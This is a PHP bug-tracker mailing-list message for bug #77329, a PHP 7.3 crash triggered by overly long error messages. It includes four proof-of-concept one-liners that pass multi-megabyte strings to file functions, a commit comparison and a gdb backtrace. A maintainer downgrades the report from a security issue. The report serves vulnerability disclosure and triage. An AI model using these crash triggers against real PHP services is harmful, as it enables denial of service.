Sec Bug->Bug #77329 [Opn]: Buffer Overflow via overly long Error Messages

From: Date: Thu, 20 Dec 2018 21:00:49 +0000
Subject: Sec Bug->Bug #77329 [Opn]: Buffer Overflow via overly long Error Messages
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-218537@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=77329&edit=1 ID: 77329 Updated by: stas@php.net Reported by: h4x0n4ut at gmail dot com Summary: Buffer Overflow via overly long Error Messages Status: Open -Type: Security +Type: Bug -Package: *General Issues +Package: Scripting Engine problem PHP Version: 7.3.0 -Assigned To: +Assigned To: dmitry Block user comment: N Private report: Y New Comment: Requires specialized code to trigger, doesn't seem to be a security issue. Dmitry, since it's your patch, could you take a look and confirm? Previous Comments: ------------------------------------------------------------------------ [2018-12-20 19:12:28] h4x0n4ut at gmail dot com Description: ------------ PHP 7.3 has a buffer overflow vulnerability that is caused by overly long error messages. Versions prior to 7.3 seem unaffected. This appears to be a fundamental problem that can be exploited via countless vectors, probably even remotely. The following code snippets cause PHP to crash: PoC 0: file_get_contents(str_repeat("A",4200000)); PoC 1: rename(str_repeat("A", 2000000),str_repeat("A", 2000000)); PoC 2: $x4 = (str_repeat("A", 12000000));$x7 = get_meta_tags($x4,0); PoC 3: popen(str_repeat("A", 2000000),str_repeat("A", 2000000)); The payloads were also tested against the php-7.3 packages of Arch Linux and Debian. It appears as if the bug was introduced in commit [1] since the size of a buffer was reduced and the crash was not reproducible with the previous revision [2] [1] https://github.com/php/php-src/commit/da1f8097fa443281e29a3a06dc9dbaba8f053f97 [2] https://github.com/php/php-src/commit/1fbcebe100ecce8fa25788870c2eff08553ee91e [asd@asd fff]$ ./php-src-1fbcebe100ecce8fa25788870c2eff08553ee91e/sapi/cli/php -r 'file_get_contents(str_repeat("A",4200000));' Warning: file_get_contents(AAAAAAAAAAAAAAA[...]AAAAAAAAA in Command line code on line 1 [asd@asd fff]$ ./php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/sapi/cli/php -r 'file_get_contents(str_repeat("A",4200000));' Segmentation fault (core dumped) Expected result: ---------------- no crash Actual result: -------------- php > file_get_contents(str_repeat("A",42000000)); Program received signal SIGSEGV, Segmentation fault. 0x00007ffff4b23ff2 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6 (gdb) bt #0 0x00007ffff4b23ff2 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6 #1 0x0000555555a6dec5 in smart_string_appendl_ex (persistent=0 '\000', len=<optimized out>, str=<optimized out>, dest=0x7fffffffcd90) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_smart_string.h:90 #2 xbuf_format_converter (xbuf=0x7fffffffcd90, is_char=1 '\001', fmt=0x55555611214b "s: %s", ap=0x7fffffffcdd0) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/spprintf.c:813 #3 0x0000555555acc3d5 in zend_vspprintf (pbuf=0x7fffffffcef8, max_len=0, format=<optimized out>, ap=<optimized out>) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend.c:171 #4 0x0000555555acc4ef in zend_spprintf (message=message@entry=0x7fffffffcef8, max_len=max_len@entry=0, format=format@entry=0x55555611214a "%s: %s") at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend.c:195 #5 0x00005555556cc667 in php_verror (docref=0x7ffff3278200 "function.file-get-contents", params=<optimized out>, type=2, format=<optimized out>, args=args@entry=0x7fffffffcf60) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/main.c:928 #6 0x00005555556ccb57 in php_error_docref1 (docref=docref@entry=0x0, param1=param1@entry=0x7fffecc00000 'A' <repeats 200 times>..., type=type@entry=2, format=format@entry=0x55555611214a "%s: %s") at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/main.c:983 #7 0x0000555555a81e2f in php_stream_display_wrapper_errors (wrapper=wrapper@entry=0x55555641ce40 <php_plain_files_wrapper>, path=path@entry=0x7fffef600018 'A' <repeats 200 times>..., caption=caption@entry=0x5555562787f3 "failed to open stream") at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/streams/streams.c:207 #8 0x0000555555a84f95 in _php_stream_open_wrapper_ex (path=path@entry=0x7fffef600018 'A' <repeats 200 times>..., mode=mode@entry=0x555556178f6d "rb", options=<optimized out>, opened_path=opened_path@entry=0x0, context=<optimized out>) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/streams/streams.c:2104 #9 0x00005555559d49a4 in zif_file_get_contents (execute_data=<optimized out>, return_value=0x7fffffffd280) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/ext/standard/file.c:550 #10 0x000055555594163c in phar_file_get_contents (execute_data=0x7ffff321b0a0, return_value=0x7fffffffd280) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/ext/phar/func_interceptors.c:224 #11 0x0000555555b673aa in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_vm_execute.h:573 #12 execute_ex (ex=0x7ffff2e01000) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_vm_execute.h:60291 #13 0x0000555555b6e96c in zend_execute (op_array=op_array@entry=0x7ffff3283000, return_value=return_value@entry=0x7fffffffd340) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_vm_execute.h:64320 #14 0x0000555555abe2ae in zend_eval_stringl (str=str@entry=0x7ffff3277000 "file_get_contents(str_repeat(\"A\",42000000));\n", str_len=str_len@entry=45, retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x55555624351e "php shell code") at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_execute_API.c:1053 #15 0x000055555595d5c9 in readline_shell_run () at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/ext/readline/readline_cli.c:681 #16 0x0000555555b70d26 in do_cli (argc=2, argv=0x55555646d190) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/sapi/cli/php_cli.c:1009 #17 0x00005555556e322c in main (argc=2, argv=0x55555646d190) at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/sapi/cli/php_cli.c:1404 ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=77329&edit=1

« previous php.bugs (#218537) next »